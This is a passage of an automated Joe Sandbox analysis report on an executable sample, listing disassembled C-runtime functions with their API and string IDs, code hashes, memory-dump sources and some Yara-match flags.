                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: FileInfoStartupType
                                • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
                                • API String ID: 3016745765-4097262939
                                • Opcode ID: 83dd7d908ca013652f32cd87f61a54e85bb94d62dd15d6cfb5665a21b32d14e3
                                • Instruction ID: 36c72e9a2a40bb0094e96d1680f38d34c49332ccf1b30c68ee8f1816f6700f51
                                • Opcode Fuzzy Hash: 83dd7d908ca013652f32cd87f61a54e85bb94d62dd15d6cfb5665a21b32d14e3
                                • Instruction Fuzzy Hash: 45E11D74E04248CFDB24CFA4C895BADBBB1BF49314F24826ED8666B392C7359846CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __inc$__mbtowc_l__un_inc
                                • String ID: $c
                                • API String ID: 579247601-3797896886
                                • Opcode ID: 459f95d43a17544e28acbd3824ffc4665fbdc270f80fafe1df8b7806a9c0a968
                                • Instruction ID: 9bffdf364293041a8ac0501eb72f12c760eb3672f1de84baf0ea36423c0b4b7c
                                • Opcode Fuzzy Hash: 459f95d43a17544e28acbd3824ffc4665fbdc270f80fafe1df8b7806a9c0a968
                                • Instruction Fuzzy Hash: 8491A070D05258DBCF24CF64C9946EEBB71AF45304F1481AFE8A97B382DA385A81CF19
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                • String ID:
                                • API String ID: 65388428-0
                                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction ID: 0480fd547939deeccef5ee13115130ab17575cab0bb5fd5beb0d1a90ef485787
                                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction Fuzzy Hash: DD516CB1D40219BBEB11DBE1DC86FEFBBB9FB04B04F100025F909B6180EB755A158BA5
                                APIs
                                Strings
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00403DAC
                                • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00403E21
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00403C70
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00403D0E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: BytesCheck
                                • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                • API String ID: 1653226792-1867057952
                                • Opcode ID: 074ae1e5b77cb788c0b6019ba89fa46f6dabf96651e95b086a777fed40d2212b
                                • Instruction ID: f01789071525d7fba52895d7c30f885225c60b6541f751bd697bd7932a74664b
                                • Opcode Fuzzy Hash: 074ae1e5b77cb788c0b6019ba89fa46f6dabf96651e95b086a777fed40d2212b
                                • Instruction Fuzzy Hash: A1613FB5E001059BDB14CF84D885FBFB7B9AF48305F24812AE515BB3D2D278E986CB58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _memset$__invalid_parameter
                                • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$sizeInBytes > retsize
                                • API String ID: 2178901135-56445615
                                • Opcode ID: ea38ecfd84dd6f58f1b891a5cc75c8417a1256aed079c0d2a3d71db4306658d8
                                • Instruction ID: ac2bbb3639e1aeb8430258686b8cc6fdcb0ba9222226e01ff3c31d1c8206fc2b
                                • Opcode Fuzzy Hash: ea38ecfd84dd6f58f1b891a5cc75c8417a1256aed079c0d2a3d71db4306658d8
                                • Instruction Fuzzy Hash: E441AC70E05209EBCF24CF68D845BEE7772FB44315F14826AE8242A3C1D37899A1CF5A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invoke_watson_if_oneof__isctype_l_swprintf_s
                                • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 4289034949-3158630120
                                • Opcode ID: 3964933c5a1a17433a191d30ada2bb3c00dfc48e94cceca2a418614246e148db
                                • Instruction ID: 689f5ae641b71c60d5018e6882faa1b8a782721c1095da81214e54a0aa4a26bf
                                • Opcode Fuzzy Hash: 3964933c5a1a17433a191d30ada2bb3c00dfc48e94cceca2a418614246e148db
                                • Instruction Fuzzy Hash: 4E31C1B0A04308DFDB04DBA1D991AADB7B1AF96308F2044AAE6057F2D2D7789A41CB54
                                APIs
                                • __set_error_mode.LIBCMTD ref: 0040D848
                                • __set_error_mode.LIBCMTD ref: 0040D857
                                • GetStdHandle.KERNEL32(000000F4), ref: 0040D86E
                                • _strlen.LIBCMT ref: 0040D894
                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040D8AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __set_error_mode$FileHandleWrite_strlen
                                • String ID: jjj$t/j
                                • API String ID: 1121076223-194299851
                                • Opcode ID: 294951e0b26baab266e2b87d3635214bd686c1ba514a58c0dc9a0d43ada468af
                                • Instruction ID: ca8227458c45a6c4e3351c8a8b6438efdd614145478f24c06b97233ce88e9426
                                • Opcode Fuzzy Hash: 294951e0b26baab266e2b87d3635214bd686c1ba514a58c0dc9a0d43ada468af
                                • Instruction Fuzzy Hash: 0621B671E00208EBEB24EFC4E985BAD3770BB54314F20817AE425662D1E3799F59DA4A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction ID: 72751cdf7d93f1fd42e82e8c5ff94951e3cd325bc4bf8f1fc81f6a52b789ccc9
                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction Fuzzy Hash: 8B519FB1E50349AAEF11DFE1DD46FEEBBB9EB04704F100025F915B6180D7B5AA058BA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction ID: 6b86f23302bf7ba322934a602d736be9eff00a95366d40080c48abee4a0d10e2
                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction Fuzzy Hash: 90516F71E50309BADF21DFE1DD46FEEBBB9EB04704F100129F915B6184EB74AA058BA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __getbuf__isatty__write
                                • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c$rjA
                                • API String ID: 2861569966-1870947407
                                • Opcode ID: c58e6d9aada3deb528eb29a0814bc9aa6163b20ee8f4833c7b858b037e2ac0e8
                                • Instruction ID: 845664154f78804b0a9a65fcfd3eb53ad15e2a98ea23fabc88bdd8a880781249
                                • Opcode Fuzzy Hash: c58e6d9aada3deb528eb29a0814bc9aa6163b20ee8f4833c7b858b037e2ac0e8
                                • Instruction Fuzzy Hash: 3451EB78A00208EFDB14CF95C491AADFBB2FF88324F148299E8456B395D634EA81CF44
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __inc$__mbtowc_l__un_inc
                                • String ID: ${
                                • API String ID: 579247601-4046706400
                                • Opcode ID: 5ad2a11c46a8d9bea455ed31c28d4367eb044bd6644287e937aaff8845a69666
                                • Instruction ID: fd90a13dd3330c8d304184b2b1228de7f7ab55ab7b9f2c9761ab5b6ac8758c94
                                • Opcode Fuzzy Hash: 5ad2a11c46a8d9bea455ed31c28d4367eb044bd6644287e937aaff8845a69666
                                • Instruction Fuzzy Hash: A441B4B0D05259DBCF24CBA5D8446EEB771AF45304F14C1BFE46977286DA385A84CF09
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: '$0$9
                                • API String ID: 3120068967-269856862
                                • Opcode ID: bdf43f7ed149b6ec473913d7eef71a0b0f9cc436f89fb9127b4bd16d7bf4e21b
                                • Instruction ID: fb47cbb1010d1bcfcdef8a3bc9faf090f85feb6c2187c58d22a889562dabb553
                                • Opcode Fuzzy Hash: bdf43f7ed149b6ec473913d7eef71a0b0f9cc436f89fb9127b4bd16d7bf4e21b
                                • Instruction Fuzzy Hash: FE41D3B1D19229DFEB24CF58C889BEEBBB5BB44304F14859AE448A7340C7389E85CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __inc$__hextodec__un_inc_isdigit_isxdigit
                                • String ID: 0$p
                                • API String ID: 500523077-2059906072
                                • Opcode ID: 56445b848237fbc14aa49cb22c206fa3f65ab3cbc6ddd945d71c5786a0529b7a
                                • Instruction ID: 744359d15ed9300e332e6c9bf2b747596e5d87ce5404043883dfa97e3472724b
                                • Opcode Fuzzy Hash: 56445b848237fbc14aa49cb22c206fa3f65ab3cbc6ddd945d71c5786a0529b7a
                                • Instruction Fuzzy Hash: 3B415EB4D042698ACF24CF65C9543EEBBB1AF45308F1481BED49976382DA395A82CF49
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                • String ID:
                                • API String ID: 3534693527-0
                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction ID: 60b025a350fa01740e83d3f17e2e91a996928935ba553d3499a73d6d0828d97c
                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction Fuzzy Hash: F031E8B2931336EBDB226BE49C00BAF67959F15B64F10C615ED04EB2DCDB748540CAA1
                                APIs
                                • __getptd_noexit.LIBCMT ref: 022D66DD
                                  • Part of subcall function 022359BF: __calloc_crt.LIBCMT ref: 022359E2
                                  • Part of subcall function 022359BF: __initptd.LIBCMT ref: 02235A04
                                • __calloc_crt.LIBCMT ref: 022D6700
                                • __get_sys_err_msg.LIBCMT ref: 022D671E
                                • __invoke_watson.LIBCMT ref: 022D673B
                                • __get_sys_err_msg.LIBCMT ref: 022D676D
                                • __invoke_watson.LIBCMT ref: 022D678B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                • String ID:
                                • API String ID: 4066021419-0
                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction ID: 195beceb2ab2ac870eacc398127ff3e968c70f5bb395892c10662083fa637d92
                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction Fuzzy Hash: 6E11C47162171A6BFB227EE5AC40BFA739DDF04760F000466FD08A6648E765D9008AE4
                                APIs
                                • ___initconout.LIBCMTD ref: 0041E144
                                  • Part of subcall function 0041EB10: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,?,0041E149), ref: 0041EB29
                                • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 0041E1C9
                                • WideCharToMultiByte.KERNEL32(00000000), ref: 0041E1D0
                                • WriteConsoleA.KERNEL32(FFFFFFFE,00000000,?,?,00000000), ref: 0041E1F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
                                • String ID:
                                • API String ID: 3432720595-0
                                • Opcode ID: 538d545bf6bf0936f1a4d494139258e950b8c1e010eb3c2ea3f4267c6b697435
                                • Instruction ID: 7772987f7334eede2e3b58f7a0d8b08be04c93e2115abb190e2c1dc353fab464
                                • Opcode Fuzzy Hash: 538d545bf6bf0936f1a4d494139258e950b8c1e010eb3c2ea3f4267c6b697435
                                • Instruction Fuzzy Hash: 23219138600204EBEB30CF51DC49FFA37A8AB44310F90067AFE15962D0D7B85982DB5E
                                APIs
                                Strings
                                • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 0040917A
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 00409186
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __getbuf__isatty__write
                                • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
                                • API String ID: 2861569966-4070537404
                                • Opcode ID: dc56555a7844053b0f0488185723e084d865ebb8d8401604b502bbe902f04c55
                                • Instruction ID: 5262c2636aaa671c650dce6d9efb5dd2f16d86043ce79ddb86740b636de742cb
                                • Opcode Fuzzy Hash: dc56555a7844053b0f0488185723e084d865ebb8d8401604b502bbe902f04c55
                                • Instruction Fuzzy Hash: 2951F974A00209EFDB04CF94C495AADFBB1FF88324F14C299E8496B396D635EE81CB44
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 0$9
                                • API String ID: 3120068967-1975997740
                                • Opcode ID: 1c2ceb2e68c1d414dff75780ba37aeb2ffc466b7c673de627fc847d56e9b4dda
                                • Instruction ID: 0c41976f65c194e9d187402291815389253d7742efd3347fb4565a4b3028f553
                                • Opcode Fuzzy Hash: 1c2ceb2e68c1d414dff75780ba37aeb2ffc466b7c673de627fc847d56e9b4dda
                                • Instruction Fuzzy Hash: B041D5B1D19229DFEB24CF58C889BEEBBB5BB45304F14859AE448A7340C7389E85CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: '$9
                                • API String ID: 3120068967-1823400153
                                • Opcode ID: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction ID: 0d3fb9e487f312781bf86d9b30c47737207e3ed2bb2d7c00a30fc94b7fc92100
                                • Opcode Fuzzy Hash: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction Fuzzy Hash: 5241F7B1E5012ADFDB24CF58C941BAEB7B5FF85314F1040AAE248A7282D7785E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: '$9
                                • API String ID: 3120068967-1823400153
                                • Opcode ID: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction ID: 66eee1d777a0329f9ee77f2eb8d4fe152f1a1981c639fcd27a1c1317939d7d61
                                • Opcode Fuzzy Hash: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction Fuzzy Hash: 8B41E5B1A102299FDB24CF58C841BAFB7B5FF85314F1040A99258BB281D7785E85CF9E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __hextodec__inc_isxdigit
                                • String ID: +$p
                                • API String ID: 3003077261-1790238857
                                • Opcode ID: 14023a0cd0d9e14a6f167f4708e1afb7d0dce05a49e604fb065495f776a2b719
                                • Instruction ID: fe9767e94a96ecfa69cfbcae28d76d248b1c7a5ef3f1c5fa3c9869e00a487168
                                • Opcode Fuzzy Hash: 14023a0cd0d9e14a6f167f4708e1afb7d0dce05a49e604fb065495f776a2b719
                                • Instruction Fuzzy Hash: 303170B0D042598ACF25CF65C9543EEBB71AF45308F1441FFC48576382DA395A81CF49
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter_memset
                                • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
                                • API String ID: 3961059608-322421350
                                • Opcode ID: a4fed7f64de0e10a9a36a2912373e52f724543dc9c4375cdafcd83e056f2b0a9
                                • Instruction ID: b603e27b430cf78f79cb029d5d20f991a93154f59d932ddaecc50e6203803a39
                                • Opcode Fuzzy Hash: a4fed7f64de0e10a9a36a2912373e52f724543dc9c4375cdafcd83e056f2b0a9
                                • Instruction Fuzzy Hash: 7121C470A01349DBDF24DF54DC45BEE73A0BB44319F20426BE828263C0D7B999A1CB6A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter_memset
                                • String ID: (_HEAP_MAXREQ / nNum) >= nSize$_calloc_dbg_impl$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 3961059608-1805389939
